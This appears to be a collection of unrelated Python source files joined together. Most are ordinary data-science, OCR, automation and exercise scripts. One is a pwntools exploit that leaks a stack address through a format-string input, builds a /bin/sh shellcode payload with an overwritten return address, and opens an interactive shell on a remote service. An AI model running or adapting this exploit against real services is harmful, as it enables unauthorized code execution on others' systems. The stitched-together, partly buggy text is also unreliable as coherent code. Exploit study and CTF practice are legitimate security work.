st.text('A 2000 internet poll voted Argentine Diego Maradona "the player of the century." FIFA disagreed strongly enough that they appointed a special committee to render judgment. The committee selected Pelé.')
st.text('Brazilians refer to soccer as the “jogo bonito” or “beautiful game.”')
if __name__=='__main__':
main()
|
"""
compute simlarity of images between all neurosynth datasets
"""
import os,pickle
import numpy,pandas
from joblib import Parallel, delayed,dump,load
from sklearn.metrics import f1_score,jaccard_similarity_score
njobs=24
data=pickle.load(open('../data/neurosynth/neurosynth_reduced_cleaned.pkl','rb'))
data=(data>0).astype('int')
dump(data,'data.mm')
data = load('data.mm', mmap_mode='r')
coords=[]
for i in range(data.shape[0]):
for j in range(i,data.shape[0]):
if i==j:
continue
coords.append((i,j))
def get_similarity(data,c):
i,j=c
return jaccard_similarity_score(data[i,:],data[j,:])
results=Parallel(n_jobs=njobs)(delayed(get_similarity)(data,c) for in coords)
pickle.dump(results,open('../data/neurosynth/ns_image_similarity_results.pkl','wb'))
os.remove('data.mm')
|
from pwn import *
shellcode = (
"\x6a\x68\x68\x2f\x2f\x2f\x73\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc9\x6a\x1c\x58"
"\x83\xE8\x11"
"\x99\xcd\x80"
)
format_str = "%6$x\n"
con = remote('localhost', 1234)
#getting leaked addr
con.recvuntil("\n");
con.send(format_str);
data = con.recvuntil("\n")
con.recvuntil(": ")
#getting address of the buffer
leak = data.split(", ")[1]
print "leaked addr: 0x" + leak
ret_addr = int(leak,16) - 0x9a
#creating payload
payload = shellcode
payload += "f"*(62-len(shellcode))
payload += p32(ret_addr)
payload += "\n"
print "sending payload..."
con.send(payload)
con.interactive() |
#!/usr/bin/python
import sys
sys.path.append('/home/admin/bin')
from gnome_ldap_utils import *
from gitlab import *
execfile('/home/admin/secret/freeipa')
glu = Gnome_ldap_utils(LDAP_GROUP_BASE, LDAP_HOST, LDAP_USER_BASE, 'cn=Directory Manager', ldap_password)
gitlab = Gitlab('gitlab.gnome.org', GITLAB_PRIVATE_TOKEN)
gnomecvs_members = glu.get_uids_from_group('gnomecvs')
for id, username in gitlab.list_ldap_users().iteritems():
ssh_key = glu.get_attributes_from_ldap(username, 'ipaSshPubKey')
gitlab.add_ssh_keys(ssh_key, id)
#for username in gitlab.list_group_members('GNOME'):
# if username not in gnomecvs_members:
# print '%s is NOT part of the gnomecvs LDAP group' % username
|
from django.apps import AppConfig
from django.db.models.signals import post_save
class ForumConfig(AppConfig):
name = "aether.forum"
def ready(self):
from .models import ForumPost, ForumUser
from .signals import postprocess_forumpost, postprocess_forumuser
post_save.connect(postprocess_forumuser, sender=ForumUser)
post_save.connect(postprocess_forumpost, sender=ForumPost)
|
import sys
import requests
if len(sys.argv) != 2:
print('Not enough arguments')
exit(1)
file = open('token.out', 'r')
token = file.readline()
HEADERS = {'Authorization': f"Bearer {token}"}
response = requests.get('https://api.intra.42.fr/v2/users', headers=HEADERS)
users_list = response.json()
needle = sys.argv[1]
result = 0
for i in users_list:
if needle == i['id']:
result = i['login']
break
elif needle == i['login']:
result = i['id']
break
f = open("ex01.out", "w")
if result == 0:
result = "Item not found"
print("EMPTY")
f.write(str(result))
f.close()
|
#!/usr/bin/python
# coding:utf-8
import cv2
import os
from .Machersolution import Matcher
import numpy as np
import json
import base64
import requests
import sys
import config
Debug = True
class AlignerIDCard(object):
def __init__(self,templateImg,templateLabel):
templateimg = cv2.imread(templateImg)
self.size = templateimg.shape
self.matcher = Matcher()
self.KP,self.DES = self.matcher.sift_fet(templateimg)
f = open(templateLabel)
lines = f.readlines()
self.num = 0
f.close()
self.rects = []
self.names = []
self.imageRoot = None
for line in lines:
self.names.append(line.strip().split(' ')[0])
self.rects.append(list(map(int,line.strip().split(' ')[1:])))
def align(self,im):
kp, des = self.matcher.sift_fet(im)
alignedImg, M = self.matcher.post_match(self.KP, self.DES, kp, des, im, input_roi=None, outputsize=(self.size[1],self.size[0]),offset=(0, 0), threshold=0.7, good_num=10)
result = {}
for idx,rect in enumerate(self.rects):
pos = np.array([[rect[0],rect[0],rect[2],rect[2]],[rect[1],rect[3],rect[3],rect[1]]]).T
cut = alignedImg[rect[1]:rect[3],rect[0]:rect[2]]
name = self.names[idx]
result[name] = [cut,pos]
return result,alignedImg
def det(self,im):
address = config.MODEL_UNIVERSAL_EAST_IDCARD_API #MODEL_UNIVERSAL_EAST_DRIVER_API MODEL_UNIVERSAL_EAST_API
img_encoded = base64.b64encode(cv2.imencode('.png',im)[1].tostring())
result = requests.post(address,data=img_encoded)
boxes = json.loads(result.text,encoding='utf-8')
return boxes
def rec(self,im,boxes):
address = config.MODEL_CRANN_BOXES_API
img_encoded = base64.b64encode(cv2.imencode('.png',im)[1].tostring())
result = requests.post(address,data=json.dumps({'img':img_encoded.decode('utf-8'),'bboxes':boxes}))
result = json.loads(result.text,encoding='utf-8')
return result
def within(self,boxes,regions,th=0.4):
ret = []
for region in regions:
res = []
region = np.array(region)
x11 = np.min(region[:,0])
y11 = np.min(region[:,1])
x12 = np.max(region[:,0])
y12 = np.max(region[:,1])
for i,box in enumerate(np.array(boxes)):
x21 = np.min(box[:,0])
y21 = np.min(box[:,1])
x22 = np.max(box[:,0])
y22 = np.max(box[:,1])
area = (x22 - x21+1)*(y22-y21+1)
xx1 = max(x11,x21)
yy1 = max(y11,y21)
xx2 = min(x12,x22)
yy2 = min(y12,y22)
w = max(0.0, xx2 - xx1 + 1)
h = max(0.0, yy2 - yy1 + 1)
inter = w * h
ioi = inter*1.0/area
if ioi >th:
res.append(i)
ret.append(res)
return ret
def AinB(self,A,B):
x11,y11,x12,y12 = A[0],A[1],A[2],A[3]
x21,y21,x22,y22 = B[0],B[1],B[2],B[3]
xx1 = max(x11,x21)
yy1 = max(y11,y21)
xx2 = min(x12,x22)
yy2 = min(y12,y22)
w = max(0.0, xx2 - xx1 + 1)
h = max(0.0, yy2 - yy1 + 1)
inter = w * h
return inter*1.0/((x12-x11+1)*(y12-y11+1))
def filtersmall(self,boxes,minH):
boxes2 = []
for box in boxes:
h = min(np.linalg.norm([box[1][0] - box[0][0],box[1][1] - box[0][1]]),np.linalg.norm([box[2][0] - box[1][0],box[2][1] - box[1][1]]))
if h >minH:
boxes2.append(box)
return boxes2
def trimBoundary(self,boxes,regions):
#match K->V
withinIdx = self.within(boxes,regions)
for regionIdx,indices in enumerate(withinIdx):
region = regions[regionIdx]
l,r,t,b = np.min(region[:,0]),np.max(region[:,0]),np.min(region[:,1]),np.max(region[:,1])
for boxIdx in indices:
box = np.array(boxes[boxIdx])
box[0,0] = box[1,0] = l
box[2,0] = box[3,0] = r
box[0,1] = box[3,1] = max(max(box[0,1],box[3,1]),t)
box[1,1] = box[2,1] = min(min(box[1,1],box[2,1]),b)
boxes[boxIdx] = box.tolist()
return boxes
def cvtResults(self,boxes,texts,regions,names):
#match K->V
withinIdx = self.within(boxes,regions)
#organize result
ret = {}
for idx,name in enumerate(names):
rindices = withinIdx[idx]
res = []
for index in rindices:
pred = np.array(boxes[index])
L = np.min(pred[:,0])
T = np.min(pred[:,1])
R = np.max(pred[:,0])
B = np.max(pred[:,1])
text = texts[index]
res.append({'pos':[L,T,R,B],'text':text})
ret[name] = res
return ret
def Chinese(self,ch):
if ord(ch) >= 0x4e00 and ord(ch)<= 0x9fa5:
return True
else:
return False
def merge(self,ret):
ret2 = {}
for key in ret:
text = ''.join(ret[key])
ret2[key] = text
return ret2
def resizebox(self,bboxes,image):
newboxes = []
for box in bboxes:
box = np.array(box)
# print(box)
centx = np.mean(box[:,0])
centy = np.mean(box[:,1])
cent = np.array([centx,centy])
# cv2.circle(image,(int(centx),int(centy)),5,(0,0,255),5)
centpoint = []
for i in range(4):
centpoint.append((box[i]+box[(i+1)%4])/2)
# cv2.circle(image,(int(((box[i]+box[(i+1)%4])/2)[0]),int(((box[i]+box[(i+1)%4])/2)[1])),5,(0,0,255),5)
centpoint = np.array(centpoint)
dis = np.sqrt((centpoint[:,0]-centx)*(centpoint[:,0]-centx)+(centpoint[:,1]-centy)*(centpoint[:,1]-centy))
newbox = []
if(dis[0]+dis[2]>dis[1]+dis[3]):
h = dis[1]+dis[3]
centpoint[0]=(centpoint[0]-np.array([centx,centy]))*(h*0.5/dis[0]+1)+np.array([centx,centy])
centpoint[2]=(centpoint[2]-np.array([centx,centy]))*(h*0.5/dis[2]+1)+np.array([centx,centy])
else:
h = dis[0]+dis[2]
centpoint[3]=(centpoint[3]-np.array([centx,centy]))*(h*0.5/dis[3]+1)+np.array([centx,centy])
centpoint[1]=(centpoint[1]-np.array([centx,centy]))*(h*0.5/dis[1]+1)+np.array([centx,centy])
# for i in range(4):
# cv2.circle(image,(int(centpoint[i][0]),int(centpoint[i][1])),5,(0,255,255),5)
for i in range(4):
newbox.append(((centpoint[i]-cent)+(centpoint[(i+1)%4]-cent)+cent).astype(np.int32).tolist())
# cv2.circle(image,(int(newbox[i][0]),int(newbox[i][1])),5,(0,255,255),5)
newboxes.append(newbox)
# cv2.imshow('image',image)
# cv2.waitKey(0)
return newboxes
def preferredSize(self,im,maxlong):
h,w = im.shape[:2]
if h>w:
H = maxlong
W = int(maxlong*1.0/h*w)
else:
W = maxlong
H = int(maxlong*1.0/w*h)
return cv2.resize(im,(W,H))
def tightBoundary(self,hitList,boxes,detectedBoxes,names,image):
for idx,name in enumerate(names):
if name in ['住址1','住址2','住址3','公民身份号码']:
hl = hitList[idx]
if len(hl)==1:
box = detectedBoxes[hl[0]]
if name == '公民身份号码':
boxes[idx] = box
continue
l,t,r,b= 32767,32767,-1,-1
for i in range(4):
l = min(box[i][0],l)
t = min(box[i][1],t)
r = max(box[i][0],r)
b = max(box[i][1],b)
# print(l,t,r,b)
cut = image[t:b,l:r,:]
offsetx = l
begin,end = self.projectMethod(cut)
# cv2.imshow('cut',cut)
# print(begin,end)
if begin<end:
l = offsetx+begin
r = offsetx+end
box[0][0],box[0][1]=l,t
box[1][0],box[1][1]=r,t
box[2][0],box[2][1]=r,b
box[3][0],box[3][1]=l,b
boxes[idx] = box
# for i in range(4):
# cv2.line(image,tuple(box[i]),tuple(box[(i+1)%4]),(0,0,255),3)
# # cv2.imshow('image',image)
# # cv2.waitKey(0)
# # print(boxes)
elif len(hl)>1:
print('xxxxxxxx',hl)
L,T,R,B= 32767,32767,-1,-1
for i in hl:
box = detectedBoxes[hl[0]]
l,t,r,b= 32767,32767,-1,-1
for i in range(4):
l = min(box[i][0],l)
t = min(box[i][1],t)
r = max(box[i][0],r)
b = max(box[i][1],b)
boxes[idx] = [[l,t],[r,t],[r,b],[l,b]]
elif name != '住址1' and name!= '公民身份号码':
boxes[idx] = [[0,0],[0,1],[1,1],[1,0]]
return np.array(boxes).tolist()
def projectMethod(self,cut,th = 0.0):
gray_img = cv2.cvtColor(cut,cv2.COLOR_BGR2GRAY)
_, binary_img = cv2.threshold(gray_img, 0, 255, cv2.THRESH_BINARY + cv2.THRESH_OTSU)
binary_img = 255 - binary_img
verticalProj = np.sum(binary_img,axis=0)*1.0/binary_img.shape[1]
begin = np.min(np.where(verticalProj>th)[0])
end = np.max(np.where(verticalProj>th)[0])
return begin,end
def predet(self,img,num=0,filename=None):
# img = cv2.imdecode(np.fromstring(base64.b64decode(img), dtype=np.uint8), 1)
img = self.preferredSize(img,2000)
result,alignedImg = self.align(img)
if alignedImg is None:
return []
regions = []
names = []
for name in result:
cut = result[name][0]
pos = result[name][1]
if name == '姓名':
offsetx = pos[0][0]
begin,end = self.projectMethod(cut)
if begin<end:
pos[0][0] = pos[1][0] = offsetx+begin
pos[2][0] = pos[3][0] = offsetx+end
regions.append(pos.tolist())
names.append(name)
boxes = np.array(regions).tolist()
return alignedImg,names,regions,boxes
def prerecog(self,detectedBoxes,alignedImg,names,regions,boxes):
detectedBoxes = self.resizebox(detectedBoxes,alignedImg)
showimg = alignedImg.copy()
hitList = self.within(detectedBoxes,regions,0.7)
boxes = self.tightBoundary(hitList,boxes,detectedBoxes,names,alignedImg)
boxes = self.filtersmall(boxes,10)
# handle name issue
boxes[-1][0][0] -= 20
boxes[-1][1][0] -= 20
boxes[-1][2][0] += 20
boxes[-1][3][0] += 20
return boxes
def postprocess(self,boxes,texts,regions,names):
ret = self.cvtResults(boxes,texts,regions,names)
ret2 = {}
for key in ret:
if not '住址' in key:
text = ret[key][0]['text'].decode('utf8')
if key == '性民':
gender = '男'
nation = '汉'
if '女' in text.decode('utf8'):
gender = '女'
pos = text.find('族')
if pos > -1:
nation = text[pos+1:]
newnation = ''
for i in range(len(nation)):
if nation[i]>='0' and nation[i]<='9':
continue
newnation+=nation[i]
nation = newnation
if nation == '汊':
nation = '汉'
ret2['性别'] = gender
ret2['民族'] = nation
elif key == '出生':
text2 = ''
for ch in text.decode('utf8'):
if ch.isdigit() or ch in ['年','月','日']:
text2 += ch
if text2.find('日' )==-1:
text2+='日'
accNum = 0
for i in range(len(text2)):
if text2[i].isdigit():
accNum+=1
prefix = {1:'199',2:'19',3:'1'}
if accNum<4 and accNum>=1:
text2 = prefix[accNum]+text2
if not ('年' in text2) and len(text2) > 4 and not (text2[4]=='年'):
text2 = text2[:4]+'年'+text2[4:]
ret2[key] = text2
elif key == '姓名':
text2 = ''
for ch in text.decode('utf8'):
if self.Chinese(ch):
text2+=ch
ret2[key] = text2
elif key =='公民身份号码':
text2 = ''
for ch in text.decode('utf8'):
if ch.isdigit():
text2+=ch
elif ch == 'x' or ch == 'X' or ch == 'X' or 'x':
text2+='X'
ret2[key] = text2
else:
tmp = ''
ret2['住址'] = ''
for zhuzhi in ['住址1','住址2','住址3']:
if len(ret[zhuzhi])>0:
zhuzhiziduan = ret[zhuzhi][0]['text']
zhuzhiziduan2 = ''
for ch in zhuzhiziduan.decode('utf8'):
if ch.isdigit()or self.Chinese(ch):
zhuzhiziduan2+=ch
tmp+=zhuzhiziduan2
else:
break
for ch in tmp.decode('utf8'):
if ch != '住' and ch != '址':
ret2['住址']+=ch
return ret2
def test(self):
f = open('output2.txt','w+')
for filename in os.listdir(self.imageRoot):
print(filename)
f.write('\n')
f.write(filename)
f.write('\n')
im = cv2.imread(self.imageRoot+'/'+filename)
ret = self.run(im,filename)
if Debug:
for key in ret:
val = ret[key]
print(key,val)
f.write(key)
f.write(':')
f.write(val)
f.write('\n')
print('----------------------------------')
cv2.waitKey(30)
f.close()
class AlignerJiaZhao(AlignerIDCard):
def __init__(self):
super(AlignerJiaZhao, self).__init__('template/1.jpg','template/1.txt')
self.imageRoot = 'image'
if __name__ == '__main__':
aligner = AlignerJiaZhao()
aligner.test()
|
from Stack import Stack
def Hist():
user_input = ""
a = []
b = []
c = []
d = []
while user_input!= "Done":
user_input = input("Enter a number between 0 and 100 per line: \n" )
if user_input.isdigit():
item = int(user_input)
if item in range (0,25):
a.append(item)
elif item in range (25,50):
b.append(item)
elif item in range (50,75):
c.append(item)
else:
d.append(item)
return a,b,c,d
a,b,c,d = Hist()
print('[0,25]', len(a) * '*')
print('[25,50]', len(b) * '*')
print('[50,75]', len(c) * '*')
print('[75, 100]', len(d) * '*')
|
import sys
sys.setrecursionlimit(10**6)
input = sys.stdin.readline
N = int(input())
tree = {}
def preOrder(root):
print(root, end = "")
if tree[root][0] != ".":
preOrder(tree[root][0])
if tree[root][1] != ".":
preOrder(tree[root][1])
def inOrder(root):
if tree[root][0] != ".":
inOrder(tree[root][0])
print(root, end = "")
if tree[root][1] != ".":
inOrder(tree[root][1])
def postOrder(root):
if tree[root][0] != ".":
postOrder(tree[root][0])
if tree[root][1] != ".":
postOrder(tree[root][1])
print(root, end = "")
# Tree 생성(adj_list)
for _ in range(N):
root, left, right = input().rstrip().split()
tree[root] = [left, right]
preOrder('A')
print()
inOrder('A')
print()
postOrder('A')
print() |
__author__ = 'vikram'
def vikgcd(a, b):
"""Calculate the Greatest Common Divisor of a and b.
Unless b==0, the result will have the same sign as b (so that when
b is divided by it, the result comes out positive).
:rtype : int
"""
i = 0
while b:
a, b = b, a % b
i += 1
return a, i
print(vikgcd(8, 6))
|
from torchvision import datasets
import matplotlib.pyplot as plt
a = datasets.MNIST("./data/mnist",
train=True,
download=True,
)
b, c = a.__getitem__(37038)
plt.imshow(b)
print(c) |
#!/usr/bin/env python
import os
import time
from collections import ChainMap
from typing import Dict
import glob2
import numpy as np
from pyarrow.parquet import ParquetFile
from src.dataset.DatasetDF import DatasetDF
from src.dataset.ParquetImageDataGenerator import ParquetImageDataGenerator
from src.dataset.Transforms import Transforms
from src.models.MultiOutputCNN import MultiOutputCNN
from src.settings import settings
from src.util.argparse import argparse_from_dicts
from src.util.csv import df_to_submission_csv, submission_df_generator
from src.util.hparam import callbacks, hparam_key, model_compile, model_stats_from_history
from src.util.logs import log_model_stats
def image_data_generator_cnn(
train_hparams: Dict,
model_hparams: Dict,
transform_X_args: Dict,
transform_Y_args: Dict,
datagen_args: Dict,
pipeline_name = 'image_data_generator_cnn',
model_file = None,
log_dir = None,
verbose = 2,
load_weights = True,
fileglobs = {}
):
combined_hparams = { **model_hparams, **train_hparams, **transform_X_args, **transform_Y_args, **datagen_args }
train_hparams = { **settings['hparam_defaults'], **train_hparams }
if verbose:
print('-----')
print("pipeline_name", pipeline_name)
print("train_hparams", train_hparams)
print("transform_X_args", transform_X_args)
print("transform_Y_args", transform_Y_args)
print("datagen_args", datagen_args)
print("model_file", model_file)
print("log_dir", log_dir)
print("load_weights", load_weights)
print('-----')
model_hparams_key = hparam_key(model_hparams)
train_hparams_key = hparam_key(train_hparams)
transform_key = hparam_key(ChainMap(*[ transform_X_args, transform_Y_args, datagen_args ]))
# csv_data = pd.read_csv(f"{settings['dir']['data']}/train.csv")
model_file = model_file or f"{settings['dir']['models']}/{pipeline_name}/{pipeline_name}-{model_hparams_key}.hdf5"
log_dir = log_dir or f"{settings['dir']['logs']}/{pipeline_name}/{transform_key}/"
os.makedirs(os.path.dirname(model_file), exist_ok=True)
os.makedirs(log_dir, exist_ok=True)
dataset_rows = ParquetFile(f"{settings['dir']['data']}/train_image_data_0.parquet").metadata.num_rows
dataset = DatasetDF(
size=1,
transform_X_args=transform_X_args,
transform_Y_args=transform_Y_args,
)
input_shape = dataset.input_shape()
output_shape = dataset.output_shape()
model = MultiOutputCNN(
input_shape=input_shape,
output_shape=output_shape,
**model_hparams,
)
model_compile(model_hparams, model, output_shape)
# Load Pre-existing weights
if load_weights:
if os.path.exists( model_file ):
try:
model.load_weights( model_file )
print('Loaded Weights: ', model_file)
except Exception as exception: print('exception', exception)
if os.environ.get('KAGGLE_KERNEL_RUN_TYPE'):
load_models = (glob2.glob(f'../input/**/{os.path.basename(model_file)}')
+ glob2.glob(f'../input/**/{os.path.basename(model_file)}'.replace('=',''))) # Kaggle Dataset Upload removes '='
for load_model in load_models:
try:
model.load_weights( load_model )
print('Loaded Weights: ', load_model)
# break
except Exception as exception: print('exception', exception)
if verbose:
model.summary()
flow_args = {}
flow_args['train'] = {
"transform_X": Transforms.transform_X,
"transform_Y": Transforms.transform_Y,
"transform_X_args": transform_X_args,
"transform_Y_args": transform_Y_args,
"batch_size": train_hparams['batch_size'],
"reads_per_file": 2,
"resamples": 1,
"shuffle": True,
"infinite": True,
}
flow_args['valid'] = {
**flow_args['train'],
"resamples": 1,
}
flow_args['test'] = {
**flow_args['train'],
"resamples": 1,
"shuffle": False,
"infinite": False,
"test": True,
}
datagens = {
"train": ParquetImageDataGenerator(**datagen_args),
"valid": ParquetImageDataGenerator(),
"test": ParquetImageDataGenerator(),
}
# [ datagens[key].fit(train_batch) for key in datagens.keys() ] # Not required
fileglobs = {
"train": f"{settings['dir']['data']}/train_image_data_[123].parquet",
"valid": f"{settings['dir']['data']}/train_image_data_0.parquet",
"test": f"{settings['dir']['data']}/test_image_data_*.parquet",
**fileglobs
}
### Preserve test/train split for Kaggle
# if os.environ.get('KAGGLE_KERNEL_RUN_TYPE'):
# # For the Kaggle Submission, train on all available data and rely on Kaggle Timeout
# fileglobs["train"] = f"{settings['dir']['data']}/train_image_data_*.parquet"
generators = {
key: datagens[key].flow_from_parquet(value, **flow_args[key])
for key,value in fileglobs.items()
}
dataset_rows_per_file = {
key: np.mean([ ParquetFile(filename).metadata.num_rows for filename in glob2.glob(fileglobs[key]) ])
for key in fileglobs.keys()
}
dataset_rows_total = {
key: sum([ ParquetFile(filename).metadata.num_rows for filename in glob2.glob(fileglobs[key]) ])
for key in fileglobs.keys()
}
### Epoch: train == one whole parquet files | valid = 1 filesystem read
steps_per_epoch = int(dataset_rows_per_file['train'] / flow_args['train']['batch_size'] * flow_args['train']['resamples'] )
validation_steps = int(dataset_rows_per_file['valid'] / flow_args['valid']['batch_size'] / flow_args['train']['reads_per_file'] )
callback = callbacks(combined_hparams, dataset, model_file, log_dir, best_only=True, verbose=1)
timer_start = time.time()
history = model.fit(
generators['train'],
validation_data = generators['valid'],
epochs = train_hparams['epochs'],
steps_per_epoch = steps_per_epoch,
validation_steps = validation_steps,
verbose = verbose,
callbacks = callback
)
timer_seconds = int(time.time() - timer_start)
model_stats = model_stats_from_history(history, timer_seconds, best_only=True)
return model, model_stats, output_shape
if __name__ == '__main__':
# Fastest with high score
# - maxpool_layers=5 | cnns_per_maxpool=3 | dense_layers=1 | dense_units=256 | global_maxpool=False | regularization=False
#
# Shortlist:
# - maxpool_layers=5 | cnns_per_maxpool=3 | dense_layers=1 | dense_units=512 | global_maxpool=True | regularization=False
# - maxpool_layers=4 | cnns_per_maxpool=4 | dense_layers=1 | dense_units=256 | global_maxpool=False | regularization=False
# - maxpool_layers=4 | cnns_per_maxpool=4 | dense_layers=1 | dense_units=256 | global_maxpool=False | regularization=True
hparams = {}
hparams['model'] = {
"cnns_per_maxpool": 3,
"maxpool_layers": 5,
"cnn_units": 32,
"cnn_kernel": 3,
"cnn_strides": 1,
"dense_layers": 1,
"dense_units": 256,
# "regularization": False, # Produces worse results
# "global_maxpool": False, #
"activation": 'relu', # 'relu' | 'crelu' | 'leaky_relu' | 'relu6' | 'softmax' | 'tanh' | 'hard_sigmoid' | 'sigmoid'
"dropout": 0.25,
}
hparams['transform_X'] = {
"resize": 2,
# "invert": True,
"rescale": True,
"denoise": True,
"center": True,
# "normalize": True,
}
hparams['transform_Y'] = {
}
# Source: https://www.kaggle.com/jamesmcguigan/bengali-ai-image-processing
hparams['datagen'] = {
# "rescale": 1./255, # "normalize": True is default in Transforms
"zoom_range": 0.2,
"width_shift_range": 0.1, # we already have centering
"height_shift_range": 0.1, # we already have centering
"rotation_range": 45/2,
"shear_range": 45/2,
# "brightness_range": 0.5, # Prebrightness normalized
"fill_mode": 'constant',
"cval": 0,
# "featurewise_center": True, # No visible effect in plt.imgshow()
# "samplewise_center": True, # No visible effect in plt.imgshow()
# "featurewise_std_normalization": True, # No visible effect in plt.imgshow() | requires .fit()
# "samplewise_std_normalization": True, # No visible effect in plt.imgshow() | requires .fit()
# "zca_whitening": True, # Kaggle, insufficent memory
}
hparams['train'] = {
"optimizer": "Adadelta",
"scheduler": "plateau10",
"learning_rate": 1,
"patience": 20,
"best_only": True,
"batch_size": 128, # Too small and the GPU is waiting on the CPU - too big and GPU runs out of RAM - keep it small for kaggle
"epochs": 999,
"loss_weights": False,
}
if os.environ.get('KAGGLE_KERNEL_RUN_TYPE') == 'Interactive':
hparams['train']['patience'] = 0
hparams['train']['epochs'] = 1
hparams['train'] = { **settings['hparam_defaults'], **hparams['train'] }
argparse_from_dicts(list(hparams.values()), inplace=True)
pipeline_name = "image_data_generator_cnn"
hparams_model_key = hparam_key(hparams['model'])
hparams_transform_key = hparam_key(ChainMap(*[ hparams['transform_X'], hparams['transform_Y'], hparams['datagen'] ]))
logfilename = f"{settings['dir']['submissions']}/{pipeline_name}/{hparams_transform_key}/{hparams_model_key}-submission.log"
csv_filename = f"{settings['dir']['submissions']}/{pipeline_name}/{hparams_transform_key}/{hparams_model_key}-submission.csv"
model, model_stats, output_shape = image_data_generator_cnn(
train_hparams = hparams['train'],
model_hparams = hparams['model'],
transform_X_args = hparams['transform_X'],
transform_Y_args = hparams['transform_Y'],
datagen_args = hparams['datagen'],
pipeline_name = pipeline_name,
load_weights = bool(os.environ.get('KAGGLE_KERNEL_RUN_TYPE'))
)
log_model_stats(model_stats, logfilename, hparams)
submission = submission_df_generator(model, output_shape)
df_to_submission_csv( submission, csv_filename )
|
# -*- coding: utf-8 -*-
# !/usr/bin/env python
import time
from selenium import webdriver
from selenium.webdriver.common.keys import Keys
print "开始"
print "......"
# 实例化一个驱动类
profiledir = webdriver.FirefoxProfile(r"/Users/sunying/Library/Application Support/Firefox/Profiles/sr6smerq.default")
# 打开火狐浏览器
driver = webdriver.Firefox(profiledir)
# 登录监控宝
driver.get("http://www.jiankongbao.com")
driver.find_element_by_id("dropdown-signin").click()
driver.find_element_by_id("email").clear()
driver.find_element_by_id("email").send_keys("**@yunzhihui.com")
driver.find_element_by_id("pwd").clear()
driver.find_element_by_id("pwd").send_keys("*** ")
driver.find_element_by_id("sigin_btn").click()
time.sleep(3)
driver.close()
driver.quit()
print "结束"
|
from math import ceil,sqrt
ltej = 6
nn = 10**3
def easyif(n):
if n in (2,3,5):
return True
if n%2 == 0:
return False
if n%3 == 0:
return False
if n%5 == 0:
return False
for i in range(7,int(ceil(sqrt(n)))):
if n%i == 0:
return False
return True
biglist=[]
for i in range(2,nn):
if easyif(i):
biglist.append(i)
def hardif(n):
for i in biglist:
if n%i == 0:
return False
return True
def genif(n):
global nn
if n<nn:
return easyif(n)
else:
return hardif(n)
def dissipate(n):
table = []
for i in range(len(str(n))):
table.append(int(str(n)[i]))
return table
def rotate(n,ile):
table = []
trial = dissipate(n)
for i in range(1,ile+1):
table.append(trial[-(ile+1)+i])
for i in trial:
table.append(i)
for i in range(1,ile+1):
del table[-1]
return table
def merge(n):
sum = 0
counter = 0
for i in n:
sum += i*10**(len(n)-counter-1)
counter += 1
return sum
list = []
for i in range(2,10**6):
if easyif(i):
checker = True
for j in range(1,len(str(i))):
rot = merge(rotate(i,j))
if not easyif(rot):
checker = False
if checker == True:
list.append(i)
print(list)
print(len(list))
|
import os
import time
from typing import List
from collections import Counter
import matplotlib.pyplot as plt
import numpy as np # Random selection
from PIL import Image
import torch # Tensor library
import torch.nn as nn # loss functinos
import torch.optim as optim # Optimization and schedulers
import torch.nn.functional as F
from torch.utils.data import DataLoader # Building custom datasets
import torchvision.transforms as T # Image processing
from torch.cuda import amp
from custom_transforms import CustomTransformation, AddGaussianNoise
from dataset_segment import LiveSegmentDataset
from logger import Logger
from metrics import pixel_accuracy, jaccard_iou, dice_coeff, tversky_measure, focal_metric
from models.unet import UNet, save_unet
def set_seed(seed):
np.random.seed(seed)
torch.manual_seed(seed)
torch.cuda.manual_seed(seed)
torch.backends.cudnn.deterministic = True
def view_outputs(model, train_dataset, threshold=0.5):
nrows = 5
ncols = 2
rows = []
for i in range(nrows):
row = []
for j in range(ncols):
img, mask = train_dataset.gen.gen_segment(fill_prob=0.4)
x = val_transforms(img).to(device).unsqueeze(0)
out = model.predict(x).detach().cpu().numpy()
preds = (np.repeat(out[0][:, :, :], 3, axis=0).transpose(1, 2, 0) > threshold)
row.append(img)
fp_mask = ((1-np.array(mask)/255) * preds*255)
fn_mask = (np.array(mask) * (1-preds))
row.append(preds*255) # multiple to 255 rgb scale
row.append(fp_mask)
row.append(fn_mask)
rows.append( np.hstack(row) )
grid_img = np.vstack(rows)
# print(grid_img.shape)
im = Image.fromarray(grid_img.astype('uint8'), 'RGB')
im.show()
im.save("images/unet_train_demo.png")
def calc_loss(logits: torch.Tensor, targets: torch.Tensor):
# bce_loss = F.binary_cross_entropy_with_logits(logits, targets)
# focal_loss = focal_metric(logits, targets, alpha=0.5, gamma=2.0)
preds = torch.sigmoid(logits)
jaccard_loss = 1.0 - jaccard_iou(preds, targets, smooth=1.0)
# dice_loss = 1.0 - dice_coeff(preds, targets, smooth=1.0)
# tversky_loss = 1.0 - tversky_measure(preds, targets, alpha=0.3, beta=0.7, smooth=1.0)
return jaccard_loss
def calc_metrics(logits: torch.Tensor, targets: torch.Tensor):
preds = torch.sigmoid(logits)
bce = F.binary_cross_entropy_with_logits(logits, targets)
metrics = {
"acc": pixel_accuracy(preds, targets, threshold=0.5).item(),
"bce": bce.item(),
"jaccard": jaccard_iou(preds, targets, smooth=1.0).item(),
"dice": dice_coeff(preds, targets, smooth=1.0).item(),
"tversky": tversky_measure(preds, targets, alpha=0.3, beta=0.7, smooth=1.0).item(),
"focal": focal_metric(logits, targets, alpha=0.5, gamma=2.0).item()
}
return metrics
if __name__ == "__main__":
MANUAL_SEED = 42
set_seed(MANUAL_SEED)
torch.backends.cudnn.benchmark = False
# Training data
save_final = True
run_validation = True
graph_metrics = True
view_results = True
view_threshold = 0.5
# Model Config
in_channels = 3
out_channels = 1
model_type = "unet" # unet, unet_nested, unet_nested_deep
filters = 4 # 16
activation = "relu" # relu, leaky_relu, silu, mish
# Training Hyperparameters
input_size = 192 # 400
train_epochs = 280 # 20
val_epochs = 4
train_size = 256 # 8000
batch_size = 16 # 4
shuffle = False
num_workers = 6
drop_last = False
# Mixed precision
use_amp = False
detect_grad_failures = False # sets autograd.detect_anomaly
# Optimization
optim_type = 'adamw' # sgd 1e-1, rmsprop 1e-3, adam 4e-3, adamw 4e-3, adagrad 1e-2
base_lr = 4e-3 # 1e-1
momentum = 0.9 # 0.9
nesterov = True
weight_decay = 5e-4 # 0, 1e-5, 3e-5, *1e-4, 3e-4, *5e-4, 3e-4, 1e-3, 1e-2
clip_grad_max = None # None is no clipping, otherwise use a positive float
scheduler_type = 'step' # step, plateau, exp
lr_milestones = [200, 250] # for StepLR, [10, 15]
lr_gamma = 0.2
plateau_patience = 20
# Dataset parameters
bkg_path = 'backgrounds' # path to background images, None is a random color background
